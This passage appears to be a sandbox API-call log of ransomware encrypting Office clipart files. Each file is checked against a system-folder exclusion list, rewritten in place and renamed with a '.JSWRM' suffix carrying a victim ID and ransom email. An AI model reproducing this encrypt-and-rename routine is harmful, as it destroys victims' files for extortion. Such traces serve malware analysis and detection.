returned 1 [0079.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0079.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.935] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0079.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.936] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe56c811, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe56c811, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099185.JPG", cAlternateFileName="")) returned 1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2=".") returned 1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="..") returned 1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="...") returned 1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="windows") returned -1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="recovery") returned -1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="perflogs") returned -1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="documents and settings") returned 1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="system volume information") returned -1 [0079.936] lstrcmpiW (lpString1="J0099185.JPG", lpString2="msocache") returned -1 [0079.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0079.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099185.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099185.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099185.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0079.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0079.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099185.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099185.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099185.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0079.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.937] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3282) returned 1 [0079.937] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcd0) returned 0x23fc98 [0079.937] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xcd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xcd0, lpOverlapped=0x0) returned 1 [0079.939] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.939] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xcd0, lpOverlapped=0x0) returned 1 [0079.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.939] CloseHandle (hObject=0x314) returned 1 [0079.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0079.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0079.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.940] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.940] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe56c811, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe56c811, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe56c811, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099186.JPG", cAlternateFileName="")) returned 1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2=".") returned 1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="..") returned 1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="...") returned 1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="windows") returned -1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="recovery") returned -1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="perflogs") returned -1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="documents and settings") returned 1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="system volume information") returned -1 [0079.940] lstrcmpiW (lpString1="J0099186.JPG", lpString2="msocache") returned -1 [0079.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099186.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099186.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099186.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099186.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099186.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099186.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.941] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16738) returned 1 [0079.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4160) returned 0x24d210 [0079.941] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4160, lpOverlapped=0x0) returned 1 [0079.944] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.944] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4160, lpOverlapped=0x0) returned 1 [0079.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.945] CloseHandle (hObject=0x314) returned 1 [0079.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0079.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0079.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0079.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0079.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0079.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0079.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.946] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe18c9a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe18c9a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe56c811, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fd0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099187.JPG", cAlternateFileName="")) returned 1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2=".") returned 1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="..") returned 1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="...") returned 1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="windows") returned -1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="recovery") returned -1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="perflogs") returned -1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="documents and settings") returned 1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="system volume information") returned -1 [0079.946] lstrcmpiW (lpString1="J0099187.JPG", lpString2="msocache") returned -1 [0079.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099187.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099187.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099187.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099187.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099187.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099187.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.947] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24528) returned 1 [0079.947] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5fd0) returned 0x24d210 [0079.947] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5fd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5fd0, lpOverlapped=0x0) returned 1 [0079.950] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.950] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5fd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5fd0, lpOverlapped=0x0) returned 1 [0079.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.950] CloseHandle (hObject=0x314) returned 1 [0079.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0079.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0079.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0079.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0079.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.951] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.952] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe18c9a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe18c9a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe56c811, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2378, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099188.JPG", cAlternateFileName="")) returned 1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2=".") returned 1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="..") returned 1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="...") returned 1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="windows") returned -1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="recovery") returned -1 [0079.952] lstrcmpiW 